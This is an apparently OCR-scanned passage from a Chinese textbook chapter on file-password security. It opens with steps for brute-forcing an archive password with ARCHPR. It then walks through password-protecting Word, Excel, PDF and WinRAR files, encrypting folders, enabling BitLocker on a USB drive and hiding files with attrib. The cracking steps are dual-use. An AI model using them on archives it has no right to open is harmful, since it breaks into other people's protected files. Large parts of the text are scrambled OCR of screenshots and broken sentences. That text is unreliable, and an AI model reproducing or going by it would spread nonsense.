图 “长度 ”字典 “本 性” 自动 分 选 页 高 级 
Tw 

回 所 有 小 瑟 拉 了 文 @ -本 kd 四 
口 所 有 数字 @ -9 结束 于 © 
Htste.) 后: 罗 
[| 用 户 定 X 口 右 
_ 扩 痢 D 


2016-12-29 10:50:06 -ARCHPR 4 54buid 5 已 局 动 


Ms: 平均 度 : 
忆 
了 
Version 4.54 (c) 1997-2012 ElcomSoft Co, Ld. 


单 去 “打开 ”按钮 ， 打 开 “ 打 开 ” 对 
话 框 ， 在 其 中 选择 加 密 的 压缩 文件 。 


思 3 环 ux 
个 医 ， RB， 疙 © | are 5 
gm © 
5 | 间 
Fy 
wa 
i OneNete os 
owook xf 
汪 Toncere Flec 
bs 看 Virtwal Mechines 
hms em 
CP Ee] 
Wndomloc) Samas 
-zzo | Beane 
下 Tt= 
= + 055 WinfAR EE 


CY ORIG) < 


RESIN | pocomerarar 所有 二 的 文件 zipyrar'ac ~ 


Cae Tw 


单 击 “ 打 开 ” 按 钮 ， 返 回 到 Advanced 
Archive Password Recovery 主 窗口 ， 并 在 其 
中 设置 组 合 密码 的 各 种 字符 ， 也 可 以 设置 


密码 的 长 度 和 破解 方式 等 选项 。 
A ARCHPR 4.54 - 0% ey x 
文 位 (月 ” 恬 复 (R) 帮助 (H) 
售 . 忆 届 SS 过 可 加 忻 
打开 开始 ! 和 各 帮助 关于 退出 
加 的 ZPRARJacejan3 文 件 攻击 类 型 
[EsersWarnistratorpoamentspoaur| 略 力 ~ 
和 “长度 ”$ 册 “ 量 福 “自动 促 存 过 页 高 级 
所 有 大 瑟 拉 耳 文 (A -如 开始 于 : ACY © 
回 所 有 小 瑟 拉 J 文 @- 习 
加 所 有 数字 0 -3) 结 来 于 ， 字 
过 所 有 特 束 生 S(@.…) 摘 : 四 
记 有 可 打印 字符 用 户 定 X 口 器 
ET 
2016-12-29 10:50:06 -AROPR 41.51buid 5 已 所 
当 总 口令: 人 平均 速度 : 50 pe 
已 计时 间 : 剩 会 时 间 : 38m 43s 
ES 次 和 | 
0% 
|ARCHPR version 4.54 (C) 1997-2012 ElcomSsoft Co. Ltd 


step 园 单 击 “开始 ”按钮 ， 即 可 开始 破解 压 
缩 文件 密码 。 


ARCHPR 434 -1 时 = x 


Wadqg 


用 户 定 义 


ps 
人 


[TFTEE IT 


解密 完成 后 ， 弹 出 一 个 信息 提示 框 ， 


在 其 中 可 以 看 到 解压 出 来 的 密码 。 
ee i 和 
ET 二 
国保 F.. Vi 
9.2 各 类 文件 密码 的 防护 策略 
在 了 解 各 类 文件 密码 的 破解 方式 后 ， 


用 户 不 难 发 现 ， 这 些 方式 能 够 破解 成 功 
的 密码 是 一 些 比较 简单 的 密码 ， 因 此 ， 用 
户 要 想 保护 自己 的 文件 密码 不 被 破解 ， 
最 简单 的 方式 就 是 给 各 类 文件 加 上 比较 
复杂 的 密码 ， 如 密码 包括 数字 、 字 母 或 特 
殊 符号 等 ， 并 且 密 码 的 长 度 最 好 超过 8 个 
字符 。 


9.2.1 加 密 Word 文 档 


Word 软 件 自身 就 提供 了 简单 的 加 密 功 
能 ， 可 以 通过 Word 软 件 所 提供 的 “选项 ” 
功能 轻松 实现 文档 的 密码 设置 ， 具 体 的 操 
作 步 又 如 下 。 

[step 加 打开 一 个 需 加 密 的 文档 ， 选 择 “ 文 
件 ” 选 项 卡 ， 在 打开 的 “文件 ”界面 中 选 
择 “ 另 存 为 ”选项 ， 然 后 选择 文件 保存 的 
位 置 为 “这 台电 脑 ”。 


第 9 章 文件 密码 数据 的 防护 策略 = 


[Step 加 单 去 “浏览 ”按钮 ， 打 开 “ 另 存 为 ” 
对 话 框 ， 在 其 中 单 击 “工具 ”按钮 ， 在 弹 
出 的 下 拉 列 表 中 选择 “常规 选项 ”选项 。 


轿 se 为 x 


NSN: | TPBE.docr | 


Rp: Word XE dco) 
cc NAN 
mp) 
Web a 
ET 


[BEE 国 打开 “常规 选项 ”对 话 框 ， 在 其 中 设 
置 打开 当前 文档 时 的 密码 及 修改 当前 文档 
时 的 密码 (这 两 个 密码 可 以 相同 ， 也 可 以 
和 不同) 。 


eR 和 


] me 


~ 天 


征管 页 
te 
FFM | 一 


ree 
Meer eto: | 


DBRSaHTAE 
Sp) 
和 
1 人 人 RS. 打开 可 各 二 六 的 文件 ， 革 二 可 信人 区 安 计 者 寺 各。 EL 
E33 


step 园 输入 完毕 后 ， 打 开 “ 确 认 密 码 ” 对 话 
框 ， 在 “请 再 次 键入 打开 文件 时 的 密码 ” 
文本 框 中 输入 打开 该 文件 的 密码 。 
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奏 志 三 7 
| WNT 
| 
秋千 如 果 天 拓 或 记忆 安 矶 ， 则 无 法 本 次 去，[ 清 记 住 ， 
更 三 旦 区 今天 小 的 ) 
3 
step 图 单 击 “确定 ”按钮 ， 打 开 “ 确 认 窗 


码 ” 对 话 框 ， 在 “请 再 次 键入 修改 文件 
时 的 密码 ”文本 框 中 输入 修改 该 文件 的 
密码 。 


RE 


HR 便 朋 此 功能 ,能 
止 对 此 文 S 关 行 误 编辑 ， 但 不 能 为 区 如 本 , 天 而 下 地 用 
ee 


单 击 “确定 ”按钮 ， 返 回 到 “另存 
地 对 话 框 中 ， 在 “文件 名 ”文本 框 中 输 
入 保存 文件 的 名 称 。 


图 5 为 x 
个 图 waaminieraor » 2 


Bs 


全 识 > 新疆 办 We ) 
国 此 电 芒 ~ A 个 当日 其 
加 Wn 
mk 
国 
#4 
BF 
am 
Windonrro (ce 


Fa RD 


~ x 忻 天 


.Ca 
step 园 单 击 “保存 ”按钮 ， 即 可 将 打开 的 
Word 文 档 保 存 起 来 。 当 再 次 打开 时 ， 将 会 
弹出 “密码 ”对 话 框 ， 在 其 中 提示 用 户 输 
入 打开 文件 所 需 的 密码 。 


审 码 ? x 


请 键入 打开 文件 所 需 的 密码 
CNV.\Documents\ 年 度 工作 报告 ,docx 


fe - 


器 理 9.2.2 ”加 密 /解密 Excel 文 件 


Excel 软 件 自身 提供 了 简单 的 设置 密码 
加 密 / 解 密 功 能 ， 使 用 Excel 自 身 功 能 加 密 / 解 
密 Exce] 文 件 的 具体 操作 步 又 如 下 。 
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1. 加 密 /解密 Excel 工 作 表 


[Step 图 打开 需要 保护 当前 工作 表 的 工作 簿 ， 

选择 “文件 ”选项 卡 ， 在 打开 的 界面 中 选 
择 “ 信 息 ” 选 项， 在 “信息 ”区 域 中 单 击 
“保护 工作 簿 ”按钮 ， 在 弹出 的 下 拉 菜 单 
中 选择 “保护 当前 工作 表 ” 选 项 。 


信息 


员工 基本 资料 表 
x 


保护 工作 篇 


RA Le 
EE 


[step 图 弹出 “保护 工作 表 ” 对 话 框 ， 系 统 默 
ye “保护 工作 表 及 锁定 的 单元 格 内 容 ” 
复 选 框 ， 也 可 以 在 “允许 此 工作 表 的 所 有 用 
户 进行 ”列表 中 选择 允许 修改 的 选项 。 


保护 工作 囊 及 铁定 的 单元 格 内 容 (O) 
允许 此 工作 可 的 所 有 用 户 进行 (Q): 


[step 图 弹出 “确认 密码 ”对 话 框 ， 
密码 ， 单 击 “确定 ”按钮 。 


在 此 输入 


RE ? x 
Ese 


[sep 图 返回 到 Excel 工 作 表 中 ， 双 击 任 一 单 
元 格 进行 数据 修改 ， 则 会 弹出 如 下 图 所 示 
的 提示 框 。 


Microsoft Exeal x 


笃 a 和 


lh， 二 科 汉 生 更 汉 ， 贡 了 茜 工 作 天 休息 可 能 和 三 和 二. 


step 图 如 果 和 要 取消 对 工作 表 的 保护 ， 可 单 击 
“信息 ”选项 卡 ， 然 后 在 “保护 工作 簿 ” 
选项 中 ， 单 击 “ 取 消 保护 ” 超 链 接 。 


BTSWAR Ee 


后- 
se 
ms 
9 
5 检查 工作 篇 
|】 。。 在 不 人 之 机 证 直 rs 
EER sat RB Patt Fe 各 
esf FS 
AR 
Lamon 
管理 工作 篇 相关 人 员 
| 


| 


在 弹出 的 “撤销 工作 表 保 护 ” 对 话 框 
中 输入 设置 的 密码 ， 单 击 “ 确 定 ” 按 钮 即 
可 取消 对 工作 表 的 保护 。 


2. 加 密 /解密 工作 簿 


打开 需要 密码 进行 加 密 的 工作 簿 。 
选择 “文件 ”选项 卡 ， 在 打开 的 界面 中 选 
择 “信息 ”选项 ， 在 “信息 ”区 域 中 单 击 
“保护 工作 簿 ”按钮 ， 在 弹出 的 下 拉 菜 单 
中 选择 “用 密码 进行 加 密 ” 选 项 。 


TS Eva 了 - x 


员工 基本 资料 表 


EE 


保护 工作 入 野性 ~ 


TAP 
a. 
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step 图 弹出 “加 密 文 档 ” 对 话 框 ， 输 入 密 
码 ， 单 击 “ 确 定 ” 按 钮 。 

加 宇文 区 ? x 

对 时 文 作 的 产 客 央 行 客 

EE 

敬告; 如 果 于 和 或 记 记 码 ， 则 无 法 板 其 栋 复 ,。 建 
议 竺 宅 酌 列 a 放 在 一 个 去 全 位 置 . 
哺 记 全 ,刻本 夺 区 分 大 小 所 的 . ) 


三 二 a 


[es 图 弹出 “确认 密码 ”对 话 框 ， 再 次 输入 
密码 ， 单 击 “ 确 定 ”按钮 。 


诡 AE 开 名 
六 4 的 产 富 出 和 NE 到 
a 
e000 
车 ; 如 果 到 欠 吏 家 记 芭 码 ， 见 无 法 析 居 你 揽 ， 
让 让 一 个 安全 位 置 ， 

哺 记 .再 呈 区 分 大 小 号 的 ，) 

[we || ™w 


为 文档 使 用 密码 进行 加 密 后 ， 在 “ 信 
息 ” 区 域内 会 显示 已 加 密 。 


必 性 - 
x 
mm 
0 
0 
» ”检查 工作 答 
之 直流 a] 
tea Pene i 
"ATL oir 
Hi 
+ 管理 工作 适 
鸣 | SS WA 
入” sr 


step 图 再 次 打开 文档 时 ， 将 弹出 “密码 ”对 
话 框 ， 输 入 密码 后 单 击 “ 确 定 ” 按 钮 ， 即 
可 打开 工作 簿 。 


二 三 
“员工 要 本 守 科 表 xex 有 二 码 保 扩 
3): | 


[Eee 国 如 果 要 取消 对 工作 簿 的 加 密 ， 在 “ 信 
息 ” 区 域 中 单 击 “ 保 护 工作 簿 ”按钮 ， 在 
弹出 的 下 拉 菜 单 中 选择 “用 密码 进行 加 
密 ” 选 项 ， 弹 出 “加 密 文 档 ” 对 话 框 ， 
清除 文本 框 中 的 密码 ， 单 击 “确定 ”按钮 
即 可 。 
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当 使 用 Adobe Acrobat Professional 来 创 
建 PDF 文 件 时 ， 创 作者 可 以 使 用 口令 安全 性 
对 其 添加 限制 ， 以 禁止 打开 、 打 印 或 编辑 
文档 ， 包 含 这 些 安全 限制 的 PDF 文 件 被 称 为 
受 限制 的 文档 。 使 用 Adobe Acrobat Profes- 
sional 加 密 PDF 文件 的 具体 操作 步骤 如 下 。 
在 制作 好 PDF 文件 内 容 后 ， 选 择 “ 高 
级 ”一 “安全 性 ”一 “使 用 口令 加 密 ” 菜 
单项 。 


Fn mim] MV rab) EG R00 TR ETD BOW mon 
ee 
[Dm De er A Sd soe 


主讲 入 ; 马 者 师 ~ 


打开 “口令 安全 性 -设置 ”对 话 框 ， 
名 选 “要 求 打开 文档 的 口令 ” 复 选 框 ， 并 
在 “文档 打开 口令 ”文本 框 中 输入 打开 文 
档 的 口令 。 


口 fr 六 性 时 作 (与 Acnbaf 7 和 天 相知 宇 ) 四 
© KB, ERR EE 


FFT) 


口 局 区 检 交配 和 向。 直 这 此 六 可 讼 要 守 受 吕 全 全 。 


COS 
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[SEE 国 单 走 “ 确 定 ” 按 钮 ， 打 开 “Adobe 
Acrobat 确认 文档 打开 口令 ” 对话 框 ， 在 “ 文 
档 打开 口令 ”文本 框 中 再 次 输入 打开 的 口令 。 


天 并 从 文 栓 3DS。 请 务必 下 本 口 人 打开 六 gd 夫 要 本 口 人 
生 
XEHFD49: "| 
三 取消 


step 园 单 去 “确定 ”按钮 ， 打 开 “Acrobat 安 
全 性 ”对 话 框 ， 提 示 用 户 “ 安 全 性 设置 在 您 


保存 文档 之 后 才能 应 用 至 本 文档 ……”。 
i = 到 训 文 枯 区 可 以 更 必 安全 性 没 和 直下 多 闪 亲 广 


es 


[ee 
单 击 “确定 ”按钮 ， 保 存 创建 好 的 
PDF 文件 ， 然 后 打开 创建 该 PDF 文件 ， 则 系 
统 将 弹出 “口令 ”对 话 框 。 


Es x 


FY 文件 " 猎 疙 生活 .pdf 福 保 护 。 请 钨 入 文 村 打开 口令 … 
第 和 OS: 下 
到 


在 “输入 口令 ”文本 框 中 输入 创建 的 
口令 密码 。 


和 文件 全 三 生活 pdf 被 保 访 ， 请 铺 入 文档 打开 口令 


区 NDS4 介 ; 门 
I 


单 击 “ 确 定 ” 按 钮 ， 即 可 打开 该 PDF 
文件 。 


TESTEIROEERITECC 3 
IT. Er EE 
EO 


[Sep 图 如 果 需 要 查看 或 者 修改 安全 性 属性 ， 
则 选择 “高 级 ” “安全 性 ” i “显示 安 


全 性 属性 ”菜单 项 ， 打 开 “ 文 档 属性 ”对 
话 框 ， 在 其 中 查看 该 文档 属性 。 
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移 提 示 : 修 改 文档 口令 的 安全 性 与 设置 文 
档 口令 的 安全 性 相似 ， 这 里 不 再 重 述 。 


CD] 一 两 
在 其 中 单 击 “ 显 示 详细 信息 ”按钮 ， 
打开 “文档 安全 性 ”对 话 框 ， 在 其 中 查看 
文档 的 安全 性 属性 。 


FE 人 


安全 人 性 方法 : 
文 6J 开 OD 邻 : 是 
;fa 可 D4: 百 

区 向 。 两 9 铸 计 
更 Pow 森 。 多 许 
注 径 : 大 许 
表意 城 前 写 或 答 各 ; 允许 
文 灿 旨 侣 ; 人 省 


+ AS 


下 


车 在 “文档 属性 ”对 话 框 中 单 击 “ 更 
改 设置 ”按钮 ， 打 开 “ 口 令 安全 性 -设置 ” 
对 话 框 ， 在 其 中 可 以 对 文档 进行 相应 的 
修改 。 


ss 性- x 


园 加 机 于 有 文才 内 容 人 
口语 除 元 数 间 的 所 有 文 相 59 容 (与 Acrobt 5 和 醒 守 版 装 安 ] (IM) 
口才 文件 洛 件 [与 Acrobet 7 和 莉 吉 版 可 大 ] 由 

千 文 村 所 有 内容 均 具 被 记 灾 ,是 扫 过 引 节 车 无 法 访 亲 文 村 风 元 类 于- 


回 要 打开 文 &s 的 口 So) 
PFOSO : 
0 
许可 

口 让 利文 区 外 和 打 句 。 改 坟 这 些 证 可 让 和 雪 要 口内 、 


maem: | 


9.2.4 ”加 密 压 缩 文件 


WinRAR 是 一 款 功能 强大 的 压缩 包 管理 窜 
器 ， 该 软件 可 用 于 备份 数据 、 缩 减 电子 邮 
件 附 件 的 大 小 、 解 压缩 从 Internet 上 下 载 的 
RAR、ZIP 格 式 及 其 他 格式 文件 ， 并 且 可 以 
新 建 RAR 及 ZIP 格 式 的 文件 。 

使 用 WinRAR 软 件 的 自 带 加 密 功能 对 压 
缩 文件 进行 加 密 的 具体 操作 步骤 如 下 。 
在 计算 机 了 驱动 器 窗口 中 选中 需要 压缩 
和 加 密 的 文件 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “添加 到 压缩 文件 ”菜单 项 。 


框 ， 在 “压缩 文件 格式 ”文本 框 中 选中 
“RAR” 单 选 按钮 ， 并 在 “压缩 文件 名 ” 


文本 框 中 输入 压缩 文件 的 名 称 。 
Es 7 
a ER EN 4 
Ee Bal 
Deen re | 
EA 
本 可 A 
ER 
全 aa Obs Om OAM) 
EE 
Ee J 
3 
ates) 
多 件 轴 
tn 灶 
广大 本 Co 
四 


[Step 图 单 击 右 下 角 的 “设置 密码 ”按钮 ， 打 
开 “ 带 密码 压缩 ”对 话 框 ， 在 其 中 “输入 
密码 ”文本 框 和 “再 次 输入 密码 以 确认 ” 
文本 框 中 输入 自己 的 密码 。 
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过 入 到 三 x 
带 密 码 压缩 
输入 密码 外) 
ee| ~ 
密码 | 
eeveee 
口 旺 示 密 码 (5) 
口 加 密 文件 名 名 
整理 密码 (0) 
可 取消 才 助 


step 图 这 样 当 解 压缩 该 文件 时 ， 会 弹出 输入 
密码 的 提示 信息 框 。 只 有 在 其 中 输入 正确 
才 可 以 对 该 文件 解压 。 


FE 


a 
上 


Is 加 
本 a 


| 

前 入 密 玉 (3) EE 

上 

Desens) 1 
E12 2 

i 击 中 | ， 


~ ET ET 


9.2.5 “加密 文件 或 文件 夹 


已 写 ”用户 可 以 为 文件 或 文件 夹 进行 加 密 ， 
从 而 保护 数据 的 安全 。 加 密 文件 或 文件 夹 

的 具体 操作 步骤 如 下 。 

[sep 回 选择 需要 加 密 的 文件 或 文件 夹 并 右 

击 ， 从 弹出 的 快捷 菜单 中 选择 “属性 ” 菜 

单 命令 。 


加 | 日 加 = | xm - oO x 
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step 回 弹出 “属性 ”对 话 框 选择“ 常规 ” 
选项 卡 ， 单 击 “ 高 级 ”按钮 。 


DA 六 


MR a Ne EY 


忆 Er 


et eR 
Be: 国 兵 这 [又 实 抽 于 交 件 去 中 旨 文 科 (R 
ORanm 计 坟 (D)- 


[step 图 弹出 “高 级 属性 ”对 话 框 ， 匀 选 “ 加 
密 内 容 以 便 保 护 数据 ” 复 选 框 ， 单 击 “ 确 
定 ” 按 钮 。 


| 


Da 
园 创 了 文人 雪人 外 ， 还 闪闪 案 此 文人 有 二 文 约 凡 窗 四 


ER 


] 二 本 以 要 下 理科 同 | 


HEne ep PMG 


Ce w 


[sp 加 返回 到 “属性 ”对 话 框 ， 单 击 “ 应 
用 ”按钮 ， 弹 出 “确认 属性 更 改 ” 对 话 
框 ， 选 中 “将 更 改 应 用 于 此 文件 夹 、 子 文 
件 夹 和 文件 ” 单 选 按钮 


(msesz x 


ER 全 ee 由 更 下 


[step 图 单 去 “确定 ”按钮 ， 返 回 到 “属性 ” 
对 话 框 。 单 击 “ 确 定 ” 按 钮 ， 弹 出 “应 用 
属性 ”对 话 框 ， 系 统 开始 对 所 选 的 文件 夹 
进行 加 密 操作 。 


时 应 用 夺 往 -. - x 
CNUs- 生 2 说 亿 还 入 门 一 息 检 邯 所 Windows 10 委 放大 撤 doc 


' 
step 较 加 密 完成 后 ， 可 以 看 到 被 加 密 的 文件 
夹 图 标 上 添加 了 小 锁 标 志 ， 表 示 加 密 成 功 。 


三 二 这 


9.3 “使 用 BitLocker 加 密 磁 盘 或 
U 盘 数据 

对 磁盘 或 U 盘 数据 进行 加 密 主要 是 使 用 

Windows 10 操 作 系 统 中 的 BitLocker 功 能 ， 


该 功能 主要 是 用 于 解决 用 户 数据 的 失窃 、 
泄漏 等 安全 性 问题 。 


9.3.1 启动 BitLocker 


使 用 BitLocker 加 密 磁盘 数据 前 ， 需 要 启 
动 BitLocker 功 能 ， 具 体 的 操作 步骤 如 下 。 
[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”菜单 命令 。 


step 图 此 时 ， 可 以 看 到 打开 的 “控制 面板 ” 


窗口 。 
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step 图 在 “控制 面板 ”窗口 中 单 击 “系统 和 
安全 ”和 链接， 打开 “系统 和 安全 ”窗口 。 


* 


[step 轩 在 该 窗口 中 单 击 “BitLocker 驱 动 器 加 
密 ” 链 接 ， 打 开 “BitLocker 驱 动 器 加 密 ” 窗 
口 ， 在 该 窗口 中 显示 了 可 以 加 密 的 驱动 器 盘 
符 和 加 密 状 态 。 展 开 各 个 盘 符 后 ， 单 击 盘 符 
后 面 的 “启用 BitLocker” 和 链接 ， 可 以 对 各 个 


驱动 器 进行 加 密 。 


wm ~ 
zams 


PA -Bexke To 


step 图 单 去 U 盘 D 后 面 的 “启用 BitLocker” 
链接 ， 打 开 “ 正 在 启动 BitLocker” 对 话 框 。 


x 
Me glocker HEEEDY 


正在 启动 BitLocker 


Bie.ocker 正 下 ft 卫 攻关 ， 计 全 近 。 
人 
十 村 打 研 闪 Blockrr 这 得 中 术 6 可 各 


5 Baloker 下 要 要 
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昌 9.3.2 “为 磁盘 进行 加 密 


启动 BitLocker 完 成 后 ， 就 可 以 为 磁 
盘 数 据 进行 加 密 操 作 了 ， 具 体 的 操作 步骤 
如 下 。 

[step 图 启动 BitLocker 完 成 后 ， 打 开 “ 选 择 

希望 解锁 此 驱动 器 的 方式 ”对 话 框 ， 勾 选 
“使 用 密码 解锁 驱动 器 ” 复 选 框 ， 按 要 求 

输入 内 容 。 


钙 Bttodker 驱动 吕 加 本 (DJ 


选择 希望 解锁 此 驱动 器 的 方式 
口 使 用 杰克 明史 E 动 号 P) 


于 -N) E23 


[step 图 单 击 “下 一 步 ” 按 钮 ， 打开“ 你 希 
望 如 何 备 份 恢 复 密 钥 ? ”对 话 框 ， 可 以 
选择 “保存 到 Microsoft 账 户 ”“ 保 存 到 文 
件 ”“ 打 印 恢复 密 钥 ”选项 ， 这 里 选择 
“保存 到 文件 ”选项 。 


人 ”由 Bhtocker 驱动 jp 本 (D) 


你 项 吝 如 何 备份 恢复 密 铜 ? 

如 果 你 此 记 密 三 或 者 委 失 智能 上 ， 可 以 使用 估 复 守 得 沪 问 虹 坟 欠 , 
字 保存 到 Microsoft 帐户 (MI 

一 保存 到 文件 (F) 

全 打印 恢复 忘 钥 (P) 


ES 


3 


[step 图 打开 “将 BitLocker 恢 复 密 钥 另存 为 ” 
对 话 框 ， 在 该 对 话 框 中 选择 恢复 密 钥 保存 
的 位 置 ， 在 “文件 名 ”文本 框 中 更 改 文件 
的 名 称 。 
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CE 一 可 


[Step 加 单 去 “保存 ”按钮 ， 关 闭 对 话 框 ， 返 
回 “你 希望 如 何 备份 恢复 密 钥 ” 对 话 框 ， 
在 该 对 话 框 的 下 侧 会 显示 已 保存 恢复 密 铀 


千 ”“ 铀 Bitocker 亚 动量 20ECD 


你 太 望 如 何 备份 众 复 宇 铜 ? 
© esrmmsn. 
如果 你 后 记 室 三 或 矢 委 失 知 能 卡 ， 可 以 使 用 你 复 要 和 访问 弧 动 乒 ， 


全 保存 到 Microsoft 帐户 (MI 
全 保存 到 文件 (F) 


全 打印 恢复 富 滑 (P) 


下 -AN 


单 击 “ 下 一 步 ”按钮 ， 进 入 “选择 要 
加 密 的 驱动 器 空间 大 小 ”对 话 框 。 


I 


人 县 stlocker EEED) 
选择 要 加 密 的 驱动 器 空间 大 小 


新 动 或 只 学 上 讼 告 8itLocke ， 则 只 大 要 加 字 当 前 使用 站 汪 动 吉 部 分 ，BitLodker 会 和 作乱 
1 政司 对 天 行动 加 宏 , 


间作 下 已 全 开交 引 蒜 开动 球 上 户 生 Bi aocker 青竹 虞 ] 生 至 个 并 动弹 加 宇 茎 人 开关 可 袖 旦 所 有 
于 二， 荨 到 已 4 但 可 苇 从 杀 名 全 可 答案 信息 的 区 入 党 到 降 护 。 


国人 j0 宇 已 用 实生 全 则 (最 适 台 于 新 电驴 忆 和 3E 动 右 ， 且 连 度 较 快 )(U) 
nm 于 人 亚当 作 汉人 于 正 下 本 用 ty 电 计 23E 动 当 , 但 过 寓 但) 


step 国 单 去 “下 一 步 ”按钮 ， 选 择 要 使 用 的 
加 密 模 式 。 
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| MM Bitiocker EO) 


选择 要 使 用 的 加 密 模 式 


Windows 10 版 本 1511 引 入 了 新 的 磋 守 雪 模 式 CKTS-AES)。 此 模式 提供 更 信 的 圭 台 本 亏 持 , 伍 与 天 
后 本 的 Windows 不 桥 安 . 


和 如果 这 是 要 在 平 期 本 的 Windows 上 全 月 的 可 移 功 反动 器 ， 则 让 连 举 英 窑 模式. 
如 时 注 县 一 个 国 寺 开动 器 ， 或 者 此 开动 关内 会 在 至少 云 行 Windows 10 版 本 1511) 到 更 二 的 妥 备 上 
便 肌 . 则 应 汪洋 新 的 只 村 区 


〇 部 加 才 懂 式 (民生 用 于 此 设备 上 的 国 寺 引 动 入 (N) 
轿 藉 认 模 式 ( 晤 适合 月 于 可 愉 此 设备 移动 的 动 哺 (C) 


2 
step 园 单 去 “下 一 步 ” 按 钮 ， 确 认 是 否 准备 
加 密 该 驱动 器 。 

全。 中 BitLocker 驱动 吨 00 灾 (Dy 


是 否 准备 加 富 该 驱动 促 ? 
他 禁 醒 可 全 月 更 下 骨 季 所 扣 加 各 - 
0 这 损人 可 能 枕 要 一 此 3 间 ， 具体 取 天 于 玛 动 吕 的 大 小 . 


ED 本 帝 成 前 ， 立 件 不 要 保护 


Cs] 了 


[Eee 图 单 去 “开始 加 密 ” 按 钮 ， 系 统 开始 对 
可 移动 数据 驱动 器 进行 加 密 ， 加 密 的 时 间 
与 驱动 器 的 容量 有 关 ， 但 是 加 密 过 程 中 不 
能 中 止 。 


和 Bocker 开 量 1[ 垃 D) 


开外 加 宅 


Ps 
十 00 本 开 认 之 前 不 委 瞩 给 中 可- 


[step 图 开始 加 密 启 动 完 成 后 ， 打 开 “BitLocker 
驱动 器 加 密 ”对话 框 ， 它 显示 加 密 的 进度 。 
BitLocker 驱动 强加 守 
< 售 正在 加 密 .… 

盖 动 器 D: 0.4% 已 完成 


侈 提 示 : 如 果 和 希望 加 密 过 程 暂停 ， 则 单 
去“ 暂停” 按钮 暂停 驱动 器 的 加 密 。 单 击 
“继续 ”按钮 ， 可 继续 对 驱动 器 进行 加 
密 ， 但 是 在 完成 加 密 过 程 之 前 ， 不 能 取 下 U 
盘 ， 否 则 了 驱动 器 内 的 文件 将 被 损坏 。 

BitLocker 驱动 印加 客 

往 j 咏 B 经 暂停 

驱动 右 D: 1.2% 已 完成 


[step 罗 加 密 完成 后 ， 将 弹出 信息 提示 框 ， 
提示 用 户 已 经 加 密 完成 。 单 击 “ 关 闭 ” 按 
钮 ，U 盘 的 加 密 完成 。 

BitLocker 驱动 串 加 客 X 

售 D: 的 加 密 已 完成 。 


9.4 实战 演练 


实战 演练 1 一 一 使 用 命令 隐藏 数据 


通过 简单 的 方法 隐藏 文件 后 ， 其 他 人 匡 
可 以 通过 简单 的 操作 显示 文件 。 为 了 解决 
这 一 问题 ， 可 以 使 用 命令 隐藏 文件 。 通 过 
命令 隐藏 文件 后 ， 别 人 不 能 再 显示 文件 ， 
而 且 通 过 搜索 也 不 能 找到 隐藏 的 文件 ， 这 
样 就 更 进一步 增加 了 数据 的 安全 性 。 

使 用 命令 隐藏 文件 的 具体 操作 步骤 如 下 。 
[step 图 按 Windows+R 组 合 键 ， 打 开 “ 运 行 ” 对 
话 框 ， 在 “打开 ”文本 框 中 输入 cmd 命 令 。 


本 运行 x 


2 Wndows 称 ,为 你 打开 相应 的 程序 . 
文件 夫 、 文档 区 Internet 资源 - 


打 fO} | 国 说 


[J 


TE).. 
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如 实战 演练 2 


[sep 贺 单 去 “确定 ”按钮 ， 在 弹出 的 DOS 窗 
口中 输入 attrib +s +a +h +r D:\123.docx， 其 
中 “D:\123.docx” 代 表 需 要 隐藏 的 文件 的 
具体 路 径 ， 按 Enter 键 确认 。 


而 管理 员 : C\WINDOWS\system32\cmd.exe 一 口 各 


icrosoft Windows [版 本 10. 0. 17134. 319] 
(ce) 2018 于 crosoft Corporation。 保留 所 有 权利 - 


;NMUsersVAdministrator7attrib +s +a th +r D:\123. docx 
:\Users\Administrator>» 


[Ee 图 打开 隐藏 文件 的 路 径 ， 发 现 文件 已 
经 隐藏 了 。 下 面 通过 显示 隐藏 文件 的 方法 
检验 是 否 被 真正 隐藏 了 ， 单 击 “ 查 看 ” 按 
钮 ， 在 弹出 的 选项 卡 中 名 选 “隐藏 的 项 
目 ” 复 选 框 。 


画 | 加 局 = 


白 ” 扰 


ET 


国 训 从 归 入 个 。 邮 起因 


如 果 用 户 想 再 次 调 出 隐藏 的 文件 ， 
在 DOS 窗 口中 输入 attrib -a -s -h -r D:\123. 
docx， 按 Enter 键 确认 。 


冯 管理 员 : C\WINDOWS\system32\cmd.exe - Oo 


icrosoft Windows [全 本 10.0. 7 者 首 项 权 
c) 2018 Microsoft Corporaticn。 


《 


:\Users\hdministrator>attrib +s 要 th +r DiN123. docx 
:\Users\Administrator>attrib -a -s -h -r D:\123, docx 


P:\Ucore\Adminietrator>e 


Be 图 此 时 ， 即 可 调 出 隐藏 的 文件 。 


显示 文件 的 扩展 名 
Windows 10 操 作 系 统 默 认 情 况 下 并 不 


”显示 文件 的 扩展 名 ， 用 户 可 以 通过 相应 的 


设置 显示 文件 的 扩展 名 ， 具 体 的 操作 步骤 
如 下 。 
stsp 国 单 去 “开始 ”按钮 ， 在 弹出 的 “ 开 
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始 ” 莱 单 中 选择 “文件 资源 管理 器 ” 选 
项 ， 打 开 “ 文 件 资源 管理 器 ”窗口 


- 口 x 
© 

v 巴 。。 变 " 侠 逐 访 同 ” 记 
小 百 乐 v v 
8 个 项 目 加 


[step 图 选择 “查看 ”选项 卡 ， 在 打开 的 功能 
区 域 中 色 选 “显示 /隐藏 ”区 域 中 的 “文件 
扩展 名 ” 复 选 框 。 


bb ”| 文 |# 资 枯 竺 理 器 = 是 和 
3 本 @ 
口 mem 四 
3 文件 扩展 名 三 法 项 
[ 项 月 本 而 月 
窗 桥 页 局 当前 机 雷 
沾 并 ， 快 本 访问 ~ 已 搜索 "快速 访问 及 
> 需 用 文件 天 (8) 
避 OneDrive 下 poe 
v 加 此 SE 后 
EE EL: 醒 
国 区 “= 
EL 
国 日 到 ca 
缚 v 
28 Se. 圆 


[Step 图 此 时 打开 一 个 文件 夹 ， 用 户 便 可 以 查 
看 到 文件 的 扩展 名 。 


图 | 四 国 > | 文档 应 用 但 - DO x 
EN := as。 ae © 
起 个 圈 ， 此 电脑 ， 文 档 v 已 益 索 "文档 记 
加 多 
并 快速 访问 
目 360js Fles 
全 OneDrive a sQL Server Management Studio 
加 此 虹 肪 a Tencent Files 
3 sb a 国 Visual Studio 2015 
图 机 首 | administratorreg 
从 | yyreg 
加 加 片 内 userreg 
是 北 事件 信息 .evtx 
晤 受 v > 


8 个 项 目 ”选中 1 个 项 目 236 字 地 


9.5 小 试 身手 


练习 1: 限制 编辑 Word 文 档 


限制 编辑 是 指控 制 其 他 人 可 对 文档 进 
